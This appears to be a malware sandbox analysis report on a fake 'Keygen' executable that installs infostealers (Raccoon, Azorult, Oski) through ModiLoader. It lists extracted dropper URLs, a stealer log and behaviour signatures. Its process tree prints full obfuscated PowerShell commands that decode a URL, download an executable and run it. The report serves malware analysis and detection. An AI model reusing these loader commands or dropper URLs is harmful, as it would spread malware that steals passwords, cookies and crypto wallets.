Overview

overview

10

Static

static

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

8

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...en.exe

windows7_x64

10

201001-nyh...en.exe

windows10_x64

10

Resubmissions

02-10-2020 21:14

201002-pjxdl9y6a6 10

01-10-2020 20:51

201001-e45lwcxsnn 10

01-10-2020 20:51

201001-fhxddb9gwe 10

01-10-2020 20:51

201001-ts8hns28ea 10

01-10-2020 20:51

201001-v1kt3kgljx 10

01-10-2020 20:51

201001-d2fbtjzv4s 10

01-10-2020 20:51

201001-cgj9prs442 10

01-10-2020 20:49

201001-t1jnpvwcgx 10

Analysis

  • max time kernel
    150s
  • max time network
    162s
  • platform
    windows7_x64
  • resource
    win7v200722
  • submitted
    01-10-2020 20:51

General

  • Target

    201001-nyhbt4p25j_pw_infected/Keygen — копия (30).exe

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhHT

exe.dropper

http://bit.do/fqhHT

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://zxvbcrt.ug/zxcvb.exe

exe.dropper

http://zxvbcrt.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJD

exe.dropper

http://bit.do/fqhJD

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://pdshcjvnv.ug/zxcvb.exe

exe.dropper

http://pdshcjvnv.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJv

exe.dropper

http://bit.do/fqhJv

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://rbcxvnb.ug/zxcvb.exe

exe.dropper

http://rbcxvnb.ug/zxcvb.exe

Extracted

Path

C:\Users\Admin\AppData\LocalLow\machineinfo.txt

Family

raccoon

Ransom Note
[Raccoon Stealer] - v1.5.13-af-hotfix Release Build compiled on Mon Jul 6 14:33:02 2020 Launched at: 2020.10.02 - 01:55:07 GMT Bot_ID: 750D7400-3B08-415E-A8B0-2695D81425F5_Admin Running on a desktop =R=A=C=C=O=O=N= - Cookies: 0 - Passwords: 0 - Files: 0 System Information: - System Language: English - System TimeZone: -0 hrs - IP: 154.61.71.13 - Location: 37.750999, -97.821999 | ?, ?, United States (?) - ComputerName: UCQFZDUI - Username: Admin - Windows version: NT 6.1 - Product name: Windows 7 Professional - System arch: x64 - CPU: Persocon Processor 2.5+ (2 cores) - RAM: 2047 MB (451 MB used) - Screen resolution: 1280x720 - Display devices: 0) Standard VGA Graphics Adapter ============

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Contains code to disable Windows Defender 2 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Oski

    Oski is an infostealer targeting browser data, crypto wallets.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Raccoon log file 1 IoCs

    Detects a log file produced by the Raccoon Stealer.

  • ModiLoader First Stage 3 IoCs
  • ModiLoader Second Stage 1 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 24 IoCs
  • Loads dropped DLL 48 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops desktop.ini file(s) 1 IoCs
  • Suspicious use of SetThreadContext 10 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 3 IoCs
  • Kills process with taskkill 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 5 IoCs
  • Modifies registry key 1 TTPs 2 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 16 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (30).exe
    "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (30).exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1612
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\DE0F.tmp\start.bat" "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — ????? (30).exe""
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1336
      • C:\Users\Admin\AppData\Local\Temp\DE0F.tmp\Keygen.exe
        Keygen.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetWindowsHookEx
        PID:1640
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\DE0F.tmp\m.hta"
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of WriteProcessMemory
        PID:1636
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
          4⤵
          • Blocklisted process makes network request
          • Loads dropped DLL
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:984
          • C:\Users\Public\ymc.exe
            "C:\Users\Public\ymc.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of SetWindowsHookEx
            PID:2384
            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              PID:2528
              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Checks processor information in registry
                PID:2368
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c taskkill /pid 2368 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\953937298760706\\* & exit
                  8⤵
                    PID:2500
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /pid 2368
                      9⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2920
              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of SetWindowsHookEx
                PID:2576
                • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:2712
              • C:\Users\Public\ymc.exe
                "C:\Users\Public\ymc.exe"
                6⤵
                • Executes dropped EXE
                PID:2632
        • C:\Windows\SysWOW64\mshta.exe
          "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\DE0F.tmp\m1.hta"
          3⤵
          • Modifies Internet Explorer settings
          • Suspicious use of WriteProcessMemory
          PID:1952
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:960
        • C:\Windows\SysWOW64\timeout.exe
          timeout 1
          3⤵
          • Delays execution with timeout.exe
          PID:2004
        • C:\Windows\SysWOW64\mshta.exe
          "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\DE0F.tmp\b.hta"
          3⤵
          • Modifies Internet Explorer settings
          • Suspicious use of WriteProcessMemory
          PID:2020
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKdg==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);gemjhbnrwydsof $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
            4⤵
            • Blocklisted process makes network request
            • Loads dropped DLL
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:768
            • C:\Users\Public\zwx.exe
              "C:\Users\Public\zwx.exe"
              5⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious use of AdjustPrivilegeToken
              PID:2340
              • C:\Windows\SysWOW64\WScript.exe
                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs"
                6⤵
                • Loads dropped DLL
                PID:2264
                • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                  "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                  7⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of SetThreadContext
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2012
                  • C:\Windows\SysWOW64\WScript.exe
                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs"
                    8⤵
                    • Loads dropped DLL
                    PID:2996
                    • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                      "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                      9⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Suspicious use of SetThreadContext
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1188
                      • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
